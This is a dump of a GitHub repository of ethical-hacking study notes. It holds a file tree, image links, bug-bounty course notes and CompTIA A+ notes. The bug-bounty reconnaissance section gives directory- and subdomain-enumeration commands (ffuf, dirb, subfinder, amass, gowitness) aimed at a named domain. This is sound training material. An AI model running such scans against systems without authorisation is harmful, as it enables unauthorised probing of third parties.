├── Assets ├── data_sec_lifecycle.png ├── deployment_model_effects.png ├── deployment_models.png ├── devops_ci.png ├── htb-osi-tcpip.png ├── hybrid_cloud.png ├── iaas.jpg ├── immutable_images.png ├── impact_on_traditional_controls.png ├── monitoring_plane.png ├── nist_model_cloud.jpg ├── prev_audit_results.png ├── secure_design_and_dev.png ├── security_impact_model.png ├── service_model_effects.png ├── shared_responsibilities.png ├── simplified_infra_comp.png ├── ssdlc.png ├── third_party_security_tools.png ├── underlying_iaas_networks.png └── vol_storage_encryption.png ├── BugBounty_TCMSec ├── AuthenticationAuthorization │ └── README.md ├── Automated │ └── README.md ├── Injection │ └── README.md ├── Intro │ └── README.md ├── Others │ └── README.md ├── README.md ├── Recon │ └── README.md └── Reporting │ └── README.md ├── CCNA ├── Images │ ├── Task1.png │ ├── Task10.jpeg │ ├── Task11.jpeg │ ├── Task12.jpeg │ ├── Task13.jpeg │ ├── Task14.jpeg │ ├── Task2.png │ ├── Task3.png │ ├── Task4.png │ ├── Task5.png │ ├── Task6.png │ ├── Task7.png │ ├── Task8.png │ ├── Task9.jpeg │ ├── ipv4-ipv6-headers.png │ ├── osi-tcpip.png │ ├── post-root-election.jpg │ └── pre-root-election.jpg └── README.md ├── CTFCheatsheet.md ├── CloudSecurity ├── CloudSecOps │ └── README.md ├── DataSecCloud │ └── README.md ├── InfraSecCloud │ └── README.md ├── IntroCloud │ └── README.md ├── ManagingCloudSec │ └── README.md ├── README.md └── SecureCloudApp │ └── README.md ├── CompTIA_220-1001 ├── Hardware │ └── README.md ├── MobileDevices │ └── README.md ├── Networking │ └── README.md ├── README.md ├── Troubleshooting │ └── README.md └── Virtualization │ └── README.md ├── CompTIA_220-1002 ├── OperatingSystems │ └── README.md ├── OperationalProcedures │ └── README.md ├── README.md ├── Security │ └── README.md └── SoftwareTroubleshooting │ └── README.md ├── CompTIA_N10-007 ├── Infrastructure │ └── README.md ├── NetworkOperations │ └── README.md ├── NetworkSecurity │ └── README.md ├── NetworkTroubleshooting │ └── README.md ├── NetworkingConcepts │ └── README.md └── README.md ├── CybersecurityAnalyst ├── Capstone │ └── README.md ├── CyberCompliance │ └── README.md ├── CyberRolesProcesses │ └── README.md ├── CyberThreatIntel │ └── README.md ├── IntroCyberToolsAttacks │ └── README.md ├── NetworkSecurity │ └── README.md ├── Pentesting │ └── README.md └── README.md ├── HTBAcademy ├── Bash │ └── README.md ├── BrokenAuthentication │ ├── README.md │ ├── basic_bruteforce.py │ ├── cookie_tampering.py │ ├── final_skill_assessment_bruteforce.py │ ├── passwd_policy_req.txt │ ├── predictable_questions.py │ ├── rate_limit_check.py │ ├── reset_token_time.py │ ├── timing.py │ └── username_injection.py ├── CommandInjections │ └── README.md ├── CommonApplications │ └── README.md ├── CommonServices │ └── README.md ├── FileInclusion │ └── README.md ├── FileTransfers │ └── README.md ├── FileUpload │ └── README.md ├── Footprinting │ ├── README.md │ └── enum-method3.png ├── HardwareAttacks │ └── README.md ├── InfoWeb │ └── README.md ├── IntroNetworking │ └── README.md ├── JSDeobfuscation │ └── README.md ├── LinuxPrivesc │ └── README.md ├── LoginBruteForce │ └── README.md ├── MetasploitFramework │ └── README.md ├── NetworkTrafficIntro │ └── README.md ├── PasswordAttacks │ └── README.md ├── README.md ├── SQLMap │ └── README.md ├── SQLi │ └── README.md ├── ServerSide │ └── README.md ├── SessionSecurity │ └── README.md ├── ShellsPayloads │ └── README.md ├── VulnerabilityAssessment │ └── README.md ├── WebAPIAttacks │ └── README.md ├── WebAttacks │ └── README.md ├── WindowsFundamentals │ └── README.md ├── WindowsPrivesc │ └── README.md ├── WordPress │ └── README.md ├── XSS │ └── README.md ├── ffuf │ └── README.md ├── hashcat │ └── README.md └── nmap │ └── README.md ├── HackTheBox ├── Academy.md ├── Access.md ├── Active.md ├── Analytics.md ├── Appointment.md ├── Archetype.md ├── Arctic.md ├── Armageddon.md ├── Base.md ├── Bashed.md ├── Bastard.md ├── Bastion.md ├── Beep.md ├── Bike.md ├── Bizness.md ├── Blocky.md ├── Blue.md ├── Blunder.md ├── Buff.md ├── Busqueda.md ├── Cap.md ├── Chatterbox.md ├── Cicada.md ├── Crocodile.md ├── Cronos.md ├── Curling.md ├── Dancing.md ├── Devel.md ├── EmdeeFive.md ├── Explosion.md ├── Forest.md ├── Grandpa.md ├── Heist.md ├── Horizontall.md ├── Ignition.md ├── Included.md ├── Jeeves.md ├── Jerry.md ├── Keeper.md ├── Knife.md ├── Lame.md ├── Legacy.md ├── Markup.md ├── Mirai.md ├── Mongod.md ├── Netmon.md ├── Nibbles.md ├── Oopsie.md ├── OpenAdmin.md ├── Optimum.md ├── Paper.md ├── Pennyworth.md ├── Photobomb.md ├── Popcorn.md ├── Precious.md ├── Preignition.md ├── Previse.md ├── Querier.md ├── README.md ├── Redeemer.md ├── Resolute.md ├── Responder.md ├── Sau.md ├── Sauna.md ├── SecNotes.md ├── Sequel.md ├── ServMon.md ├── Shocker.md ├── Shoppy.md ├── Synced.md ├── Tactics.md ├── Three.md ├── Traceback.md ├── Unified.md ├── Vaccine.md ├── Valentine.md └── Wifinetic.md ├── LearnEthicalHackingFromScratch_Udemy ├── GainingAccess │ └── README.md ├── NetworkHacking │ └── README.md ├── PostExploitation │ └── README.md ├── README.md ├── WebsiteHacking │ └── README.md └── autoit-download-and-execute.txt ├── Linux101_TCMSec ├── Filesystem │ └── README.md ├── Intro │ └── README.md ├── Process │ └── README.md ├── README.md ├── RegexScripting │ └── README.md ├── Shells │ └── README.md ├── Software │ └── README.md ├── UsersGroups │ └── README.md └── Utilities │ └── README.md ├── LinuxPrivilegeEscalation_TCMSec ├── Capstone │ └── README.md ├── EscalationPaths │ └── README.md ├── InitialEnum │ └── README.md └── README.md ├── MPP_TCMSec ├── C2 │ └── README.md ├── DomainEnum │ └── README.md ├── EnumPrivescPersistence │ └── README.md ├── Foothold │ └── README.md ├── MPPDomain │ └── README.md └── README.md ├── MalwareAnalysis_TCMSec ├── AdvancedDynamicAnalysis │ └── README.md ├── AdvancedStaticAnalysis │ └── README.md ├── AnalysingGoMalware │ └── README.md ├── Automation │ └── README.md ├── BasicDynamicAnalysis │ └── README.md ├── BasicStaticAnalysis │ └── README.md ├── BinaryPatching │ └── README.md ├── Challenge1 │ └── README.md ├── Challenge2 │ └── README.md ├── LabSetup │ └── README.md ├── MaldocAnalysis │ └── README.md ├── MobileMalware │ └── README.md ├── README.md ├── RealworldMalware │ └── README.md ├── ReversingC#Malware │ └── README.md ├── RulesReports │ └── README.md ├── ScriptedMalwareDelivery │ └── README.md ├── ShellcodeAnalysis │ └── README.md └── SpecialtyMalwareClasses │ └── README.md ├── MobilePentest_TCMSec ├── AndroidDA │ └── README.md ├── AndroidSA │ └── README.md ├── Intro │ └── README.md ├── README.md ├── iosDA │ └── README.md └── iosSA │ └── README.md ├── OSINT_TCMSec ├── Intro │ └── README.md ├── OSINT │ └── README.md ├── README.md └── Tools │ └── README.md ├── Pentest_TCMSec ├── Intro │ └── README.md ├── PentestFindings │ └── README.md ├── PentestMethodology │ └── README.md └── README.md ├── PortSwigger ├── Advanced │ └── README.md ├── Client-side │ └── README.md ├── Labs │ └── README.md ├── README.md └── Server-side │ ├── README.md │ └── SQLi.md ├── PracticalEthicalHacking_TCMSec ├── ActiveDirectory │ └── README.md ├── Capstone │ └── README.md ├── ExploitDevelopment │ └── README.md ├── ExploitationBasics │ └── README.md ├── Linux │ └── README.md ├── Networking │ └── README.md ├── OWASPJuiceShop │ └── README.md ├── PostExploitation │ └── README.md ├── Python │ └── README.md ├── README.md ├── Recon │ └── README.md ├── ScanAndEnum │ └── README.md ├── WebAppEnum │ └── README.md └── WirelessPentest │ └── README.md ├── Python101_TCMSec ├── ExtendingPython │ └── README.md ├── Python101 │ └── README.md ├── README.md ├── restricted-sql-injection.py ├── sha256-cracking.py ├── sql-injection.py ├── ssh-bruteforce.py └── weblogin-bruteforce.py ├── Python201_TCMSec ├── ExtendingPython │ └── README.md ├── OOP │ └── README.md ├── Python201 │ └── README.md ├── README.md ├── WindowsAPI │ └── README.md ├── buffer_overflow.py ├── encrypted_bind_shell.py ├── keylogger.py ├── proc_shellcode.py └── remote_dll_injection.py ├── README.md ├── TryHackMe ├── CompleteBeginner │ └── README.md ├── JrPentester │ └── README.md ├── PreSecurity │ └── README.md ├── README.md └── Rooms │ ├── AVEvasion.md │ ├── AbusingWindowsInternals.md │ ├── ActiveDirectoryBasics.md │ ├── AdventOfCyber1.md │ ├── AdventOfCyber2.md │ ├── AdventOfCyber3.md │ ├── AdventureTime.md │ ├── AgentSudo.md │ ├── AgentT.md │ ├── Alfred.md │ ├── Annie.md │ ├── Anonforce.md │ ├── Anonymous.md │ ├── Anthem.md │ ├── Archangel.md │ ├── Athena.md │ ├── Atlas.md │ ├── AttackingKerberos.md │ ├── AttacktiveDirectory.md │ ├── Badbyte.md │ ├── Battery.md │ ├── Biohazard.md │ ├── Blog.md │ ├── BoilerCTF.md │ ├── BountyHacker.md │ ├── Brainstorm.md │ ├── BreachingAD.md │ ├── BreakOutTheCage.md │ ├── BricksHeist.md │ ├── Brim.md │ ├── BruteIt.md │ ├── BufferOverflowPrep.md │ ├── BypassingUAC.md │ ├── CMesS.md │ ├── CatPictures.md │ ├── CheeseCTF.md │ ├── Chronicle.md │ ├── ColddBox.md │ ├── Committed.md │ ├── ConvertMyVideo.md │ ├── Couch.md │ ├── CrackTheHash.md │ ├── CrackTheHashLevel2.md │ ├── Creative.md │ ├── CyberLens.md │ ├── Cyborg.md │ ├── DAST.md │ ├── DailyBugle.md │ ├── DataExfiltration.md │ ├── Dav.md │ ├── Debug.md │ ├── Disgruntled.md │ ├── DiskAnalysisAutopsy.md │ ├── DissectingPEHeaders.md │ ├── EasyPeasy.md │ ├── Empline.md │ ├── EnumeratingAD.md │ ├── Enumeration.md │ ├── EvadingLoggingandMonitoring.md │ ├── ExploitingAD.md │ ├── Expose.md │ ├── Firewalls.md │ ├── FowsniffCTF.md │ ├── Gallery.md │ ├── GameZone.md │ ├── GamingServer.md │ ├── GoldenEye.md │ ├── HAJokerCTF.md │ ├── HackPark.md │ ├── HackerVsHacker.md │ ├── HackingWithPowerShell.md │ ├── Heartbleed.md │ ├── Holo.md │ ├── Ignite.md │ ├── Inferno.md │ ├── IntroC2.md │ ├── IntroMalwareAnalysis.md │ ├── IntroductionToCryptography.md │ ├── InvestigatingWindows.md │ ├── JackOfAllTrades.md │ ├── JacobTheBoss.md │ ├── JurassicPark.md │ ├── KAPE.md │ ├── Kiba.md │ ├── LazyAdmin.md │ ├── Lian_Yu.md │ ├── Library.md │ ├── LinuxForensics.md │ ├── LivingOffTheLand.md │ ├── LookingGlass.md │ ├── MadeyeCastle.md │ ├── Madness.md │ ├── MalwareIntroductory.md │ ├── Mnemonic.md │ ├── MrRobotCTF.md │ ├── Mustacchio.md │ ├── NetworkSecuritySolutions.md │ ├── NewHireOldArtifacts.md │ ├── ObfuscationPrinciples.md │ ├── OhMyWebServer.md │ ├── OhSINT.md │ ├── Ollie.md │ ├── Olympus.md │ ├── Osquery.md │ ├── OsqueryBasics.md │ ├── Overpass.md │ ├── Overpass2Hacked.md │ ├── PasswordAttacks.md │ ├── PersistingAD.md │ ├── Phishing.md │ ├── Plotted-TMS.md │ ├── PostExploitationBasics.md │ ├── Poster.md │ ├── PrintNightmare.md │ ├── PrintNightmareAgain.md │ ├── PrintNightmareThrice.md │ ├── Publisher.md │ ├── README.md │ ├── REMnux.md │ ├── RazorBlack.md │ ├── RedTeamRecon.md │ ├── Redline.md │ ├── Relevant.md │ ├── Res.md │ ├── Retro.md │ ├── Road.md │ ├── RootMe.md │ ├── RuntimeDetectionEvasion.md │ ├── SafeZone.md │ ├── SakuraRoom.md │ ├── SearchlightIMINT.md │ ├── SignatureEvasion.md │ ├── Skynet.md │ ├── SmagGrotto.md │ ├── SolarLog4j.md │ ├── Source.md │ ├── Strings.md │ ├── Subscribe.md │ ├── Sustah.md │ ├── Sweettooth.md │ ├── Sysmon.md │ ├── TacticalDetection.md │ ├── Tempest.md │ ├── TheBlobBlog.md │ ├── Thompson.md │ ├── ThreatIntelTools.md │ ├── TokyoGhoul.md │ ├── ToolsRus.md │ ├── UltraTech.md │ ├── Unattended.md │ ├── Valley.md │ ├── Velociraptor.md │ ├── VulnNet.md │ ├── VulnNetRoasted.md │ ├── Warzone1.md │ ├── Warzone2.md │ ├── Watcher.md │ ├── WebOSINT.md │ ├── Wekor.md │ ├── WgelCTF.md │ ├── Willow.md │ ├── WindowsForensics1.md │ ├── WindowsForensics2.md │ ├── WindowsHardening.md │ ├── WindowsInternals.md │ ├── WindowsLocalPersistence.md │ ├── WindowsPrivilegeEscalation.md │ ├── WiresharkTrafficAnalysis.md │ ├── Wonderland.md │ ├── Wreath.md │ ├── YearOfTheRabbit.md │ ├── Zeek.md │ ├── ZeekExercises.md │ ├── ZeroLogon.md │ ├── c4ptur3-th3-fl4g.md │ ├── dogcat.md │ ├── ffuf.md │ ├── h4cked.md │ ├── simplectf.md │ └── tomghost.md ├── WindowsPrivilegeEscalation_TCMSec ├── Capstone │ └── README.md ├── EscalationPaths │ └── README.md ├── InitialEnum │ └── README.md └── README.md └── picoCTF ├── LearningGuides └── README.md ├── README.md └── picoGym └── README.md /Assets/data_sec_lifecycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/data_sec_lifecycle.png -------------------------------------------------------------------------------- /Assets/deployment_model_effects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/deployment_model_effects.png -------------------------------------------------------------------------------- /Assets/deployment_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/deployment_models.png -------------------------------------------------------------------------------- /Assets/devops_ci.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/devops_ci.png -------------------------------------------------------------------------------- /Assets/htb-osi-tcpip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/htb-osi-tcpip.png -------------------------------------------------------------------------------- /Assets/hybrid_cloud.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/hybrid_cloud.png -------------------------------------------------------------------------------- /Assets/iaas.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/iaas.jpg -------------------------------------------------------------------------------- /Assets/immutable_images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/immutable_images.png -------------------------------------------------------------------------------- /Assets/impact_on_traditional_controls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/impact_on_traditional_controls.png -------------------------------------------------------------------------------- /Assets/monitoring_plane.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/monitoring_plane.png -------------------------------------------------------------------------------- /Assets/nist_model_cloud.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/nist_model_cloud.jpg -------------------------------------------------------------------------------- /Assets/prev_audit_results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/prev_audit_results.png -------------------------------------------------------------------------------- /Assets/secure_design_and_dev.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/secure_design_and_dev.png -------------------------------------------------------------------------------- /Assets/security_impact_model.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/security_impact_model.png -------------------------------------------------------------------------------- /Assets/service_model_effects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/service_model_effects.png -------------------------------------------------------------------------------- /Assets/shared_responsibilities.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/shared_responsibilities.png -------------------------------------------------------------------------------- /Assets/simplified_infra_comp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/simplified_infra_comp.png -------------------------------------------------------------------------------- /Assets/ssdlc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/ssdlc.png -------------------------------------------------------------------------------- /Assets/third_party_security_tools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/third_party_security_tools.png -------------------------------------------------------------------------------- /Assets/underlying_iaas_networks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/underlying_iaas_networks.png -------------------------------------------------------------------------------- /Assets/vol_storage_encryption.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/Assets/vol_storage_encryption.png -------------------------------------------------------------------------------- /BugBounty_TCMSec/Automated/README.md: -------------------------------------------------------------------------------- 1 | # Automated Tools 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Injection/README.md: -------------------------------------------------------------------------------- 1 | # Injection Attacks 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Intro/README.md: -------------------------------------------------------------------------------- 1 | # Introduction 2 | 3 | * Web app security - best practices: 4 | 5 | * Regular patching & updates 6 | * Least privilege 7 | * Secure code 8 | * Secure data storage 9 | * MFA 10 | * Logging & monitoring 11 | * User training 12 | 13 | * HTTP - stateless request-response protocol; common HTTP methods include GET, POST, PUT and DELETE 14 | 15 | * HTTP response codes: 16 | 17 | * 1xx - Informational 18 | * 2xx - Successful 19 | * 3xx - Redirection 20 | * 4xx - Client errors 21 | * 5xx - Server errors 22 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Others/README.md: -------------------------------------------------------------------------------- 1 | # Other Common Vulnerabilities 2 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/README.md: -------------------------------------------------------------------------------- 1 | # Practical Bug Bounty 2 | 3 | Notes for the TCM Security course [Practical Bug Bounty](https://academy.tcm-sec.com/p/practical-bug-bounty): 4 | 5 | 1. [Introduction](Intro/README.md) 6 | 1. [Reconnaissance](Recon/README.md) 7 | 1. [Authentication and Authorization Attacks](AuthenticationAuthorization/README.md) 8 | 1. [Injection Attacks](Injection/README.md) 9 | 1. [Automated Tools](Automated/README.md) 10 | 1. [Other Common Vulnerabilities](Others/README.md) 11 | 1. [Reporting](Reporting/README.md) 12 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Recon/README.md: -------------------------------------------------------------------------------- 1 | # Reconnaissance 2 | 3 | * Fingerprinting web technologies: 4 | 5 | * [BuiltWith](https://builtwith.com/) 6 | * [Wappalyzer](https://www.wappalyzer.com/) 7 | * [Security Headers](https://securityheaders.com) 8 | 9 | * Directory enumeration: 10 | 11 | ```shell 12 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.0.0.10/FUZZ 13 | 14 | dirb http://10.0.0.10 15 | # scans recursively by default 16 | 17 | # can use other tools as well like dirbuster and gobuster 18 | ``` 19 | 20 | * Subdomain enumeration: 21 | 22 | ```shell 23 | # we can use resources like Google or crt.sh on web 24 | # but they give limited results 25 | 26 | subfinder -d azena.com -o azena.txt 27 | 28 | assetfinder azena.com 29 | 30 | assetfinder azena.com | grep azena.com | sort -u > azena-subdomains.txt 31 | # only print unique and required subdomains 32 | 33 | amass enum -d azena.com >> azena-subdomains.txt 34 | 35 | # after gathering all subdomains 36 | # need to check if they are up or not 37 | cat azena-subdomains.txt | grep azena.com | sort -u | httprobe -prefer-https | grep https > azena-alive.txt 38 | 39 | mkdir azenapics 40 | 41 | # screenshot automation for each page 42 | # need to remove 'https://' string from final subdomains file for gowitness to work 43 | gowitness file -f azena-alive.txt -P azenapics --no-http 44 | ``` 45 | -------------------------------------------------------------------------------- /BugBounty_TCMSec/Reporting/README.md: -------------------------------------------------------------------------------- 1 | # Reporting 2 | -------------------------------------------------------------------------------- /CCNA/Images/Task1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task1.png -------------------------------------------------------------------------------- /CCNA/Images/Task10.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task10.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task11.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task11.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task12.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task12.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task13.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task13.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task14.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task14.jpeg -------------------------------------------------------------------------------- /CCNA/Images/Task2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task2.png -------------------------------------------------------------------------------- /CCNA/Images/Task3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task3.png -------------------------------------------------------------------------------- /CCNA/Images/Task4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task4.png -------------------------------------------------------------------------------- /CCNA/Images/Task5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task5.png -------------------------------------------------------------------------------- /CCNA/Images/Task6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task6.png -------------------------------------------------------------------------------- /CCNA/Images/Task7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task7.png -------------------------------------------------------------------------------- /CCNA/Images/Task8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task8.png -------------------------------------------------------------------------------- /CCNA/Images/Task9.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/Task9.jpeg -------------------------------------------------------------------------------- /CCNA/Images/ipv4-ipv6-headers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/ipv4-ipv6-headers.png -------------------------------------------------------------------------------- /CCNA/Images/osi-tcpip.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/osi-tcpip.png -------------------------------------------------------------------------------- /CCNA/Images/post-root-election.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/post-root-election.jpg -------------------------------------------------------------------------------- /CCNA/Images/pre-root-election.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/CCNA/Images/pre-root-election.jpg -------------------------------------------------------------------------------- /CloudSecurity/README.md: -------------------------------------------------------------------------------- 1 | # Cloud Security 2 | 3 | * Notes for the [Cloud Security](https://www.netacad.com/courses/cybersecurity/cloud-security) course on Cisco Networking Academy (CCSK-CSA). 4 | 5 | * Topics: 6 | 7 | * [Introduction to Cloud](IntroCloud/README.md) 8 | 9 | * [Infrastructure Security for Cloud](InfraSecCloud/README.md) 10 | 11 | * [Managing Cloud Security & Risk](ManagingCloudSec/README.md) 12 | 13 | * [Data Security for Cloud](DataSecCloud/README.md) 14 | 15 | * [Securing Cloud Applications, Users & Related Technologies](SecureCloudApp/README.md) 16 | 17 | * [Cloud Security Operations](CloudSecOps/README.md) 18 | -------------------------------------------------------------------------------- /CompTIA_220-1001/MobileDevices/README.md: -------------------------------------------------------------------------------- 1 | # Mobile Devices 2 | 3 | ## Laptop Hardware 4 | 5 | * Laptop computers tend to use solid-state drives, compared to desktop computers which prefer using hard drives. Hybrid drives are used as well. 6 | 7 | * Similarly, memory modules in laptops are smaller - common ones are SO-DIMM (Small Outline Dual In-line Memory Module) and Micro-DIMM. 8 | 9 | * The video cards are often built into the processor or the system board, and are non-upgradable. 10 | 11 | * The power conversion for laptops is done on an external device that provides DC power directly into the laptop. AC adapters are used to convert AC into DC. 12 | 13 | * The components used inside the laptop are designed for mobility and power management. 14 | 15 | ## Laptop Displays 16 | 17 | * Laptops usually use LCD (Liquid Crystal Display). It is lightweight, cheap and requires low power. However, black levels are a challenge. 18 | 19 | * OLED (Organic Light Emitting Diode) does not require backlight, unlike LCD. They are thinner and lighter. However they are costlier and consume more power. 20 | 21 | * WiFi antennas are also used in laptop displays. 22 | 23 | * Backlighting can be either LED-backlit or fluoroscent. 24 | 25 | ## Laptop Features 26 | 27 | * Smaller keyboards and function toggles are typical laptop features. 28 | 29 | * Docking stations allow laptops to use external keyboard and mouse, or add additional functionality in general. 30 | 31 | ## Mobile Device 32 | 33 | * Designed for touch input, these are small-sized single-screened computers. 34 | 35 | ## Mobile Device Accessories 36 | 37 | * Mobile device connections are supported by accessories such as Micro-USB, Mini-USB and USB-C plugs. 38 | 39 | * Tethering is allowed by physically connecting a device to a phone to use Internet connection. WiFi hotspot does the same thing but it is wireless. 40 | 41 | * Bluetooth is a type of PAN (Personal Area Network) and it offers high speed communication over short distances. 42 | 43 | * Wired headsets are connected to the analog audio jack using TRRS (Tip-Ring-Ring-Sleeve) connector. 44 | 45 | * A SD or a microSD card can be used in phones to increase the storage capacity. 46 | 47 | ## Mobile Device Connectivity 48 | 49 | * Wireless networks used commonly on phones include cellular, WiFi and Bluetooth. 50 | 51 | * IMEI (International Mobile Station Equipment Identity) and IMSI (International Mobile Subscriber Identity) are used to identify the device and the user, respectively. 52 | 53 | * For older devices, retreiving mail used POP3 and IMAP, and sending mail used SMTP. For newer ones, commercial email providers are being used. 54 | 55 | ## Mobile Device Synchronization 56 | 57 | * We can synchronize our data to the cloud, a desktop computer or to other appliances. 58 | -------------------------------------------------------------------------------- /CompTIA_220-1001/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA A+ 220-1001 2 | 3 | Notes for the Professor Messer course [CompTIA A+ 220-1001 Training](https://www.professormesser.com/free-a-plus-training/220-1001/220-1000-training-course/). 4 | 5 | Topics: 6 | 7 | * [Mobile Devices](MobileDevices/README.md) 8 | 9 | * [Networking](Networking/README.md) 10 | 11 | * [Hardware](Hardware/README.md) 12 | 13 | * [Virtualization and Cloud Computing](Virtualization/README.md) 14 | 15 | * [Hardware and Network Troubleshooting](Troubleshooting/README.md) 16 | -------------------------------------------------------------------------------- /CompTIA_220-1001/Virtualization/README.md: -------------------------------------------------------------------------------- 1 | # Virtualization and Cloud Computing 2 | 3 | ## Cloud Computing 4 | 5 | * IaaS (Infrastructure as a Service) - equipment outsourced. 6 | 7 | * SaaS (Software as a Service) - on-demand software. 8 | 9 | * PaaS (Platform as a Service) - develop applications from platform modules. 10 | 11 | * Cloud deployment models - private, public, hybrid and community. 12 | 13 | * Cloud computing features - rapid elasticity, on-demand self-service, resource pooling, measured service. 14 | 15 | * Common cloud services: 16 | 17 | 1. Email applications 18 | 2. Cloud file storage 19 | 3. 